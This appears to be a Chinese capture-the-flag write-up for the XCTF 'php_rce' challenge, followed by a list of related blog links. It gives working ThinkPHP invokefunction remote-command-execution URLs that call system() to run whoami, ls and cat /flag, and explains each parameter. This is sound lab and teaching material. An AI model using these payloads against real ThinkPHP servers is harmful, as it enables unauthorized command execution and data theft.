88.[4]攻防世界 web php_rce

之前做过,回顾(看了眼之前的wp,跟没做过一样)

属于远程命令执行漏洞

在 PHP 里,system()exec()shell_exec()、反引号(`)等都可用于执行系统命令。

直接访问index.php没效果

复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
  • s=index/think\app/invokefunction :这部分指定了要调用的控制器和方法。在 ThinkPHP 框架里,路由解析机制允许通过这种方式指定要执行的操作,攻击者利用这个特性来调用框架内部的 invokefunction 方法。
  • function=call_user_func_arraycall_user_func_array 是 PHP 的一个内置函数,它能够以数组形式传递参数来调用指定的函数。攻击者利用此函数来动态调用其他函数。
  • vars[0]=system :这里将 system 作为要调用的函数名。system 是 PHP 中用于执行系统命令的函数。
  • vars[1][]=whoami :这是传递给 system 函数的参数,也就是要执行的系统命令。whoami 命令的作用是显示当前系统用户的名称。
复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

ls / 用于列出根目录(/)下的所有文件和文件夹。

复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag
复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat  
 /flag

cat 用于查看文件内容。

相关推荐
带娃的IT创业者7 小时前
第4集:配置管理的艺术:环境变量、多环境配置与安全实践
开发语言·python·安全·项目配置·开发基础
合作小小程序员小小店8 小时前
Web渗透之一句话木马
web安全·网络安全·安全威胁分析·安全架构·安全性测试
white-persist8 小时前
Burp Suite模拟器抓包全攻略
前端·网络·安全·web安全·notepad++·原型模式
网安小白的进阶之路14 小时前
A模块 系统与网络安全 第四门课 弹性交换网络-3
网络·安全·web安全
安当加密14 小时前
基于PostgreSQL的TDE透明加密解决方案:构建数据全生命周期的国密合规安全体系
安全·postgresql·区块链
源文雨16 小时前
MacOS 下 Warp ping 局域网设备报错 ping: sendto: No route to host 的解决方法
运维·网络协议·安全·macos·网络安全·ping
周某人姓周16 小时前
安全初级(二)HTTP
网络协议·安全·http
Hello.Reader16 小时前
在运行中的 Kafka 集群渐进式启用安全零停机实战手册(KRaft/Broker 通用)
分布式·安全·kafka
国科安芯19 小时前
关于软错误的常见问题解答
单片机·嵌入式硬件·安全·硬件架构·软件工程
小红帽61521 小时前
使用burp工具的intruder模块进行密码爆破
网络·安全·html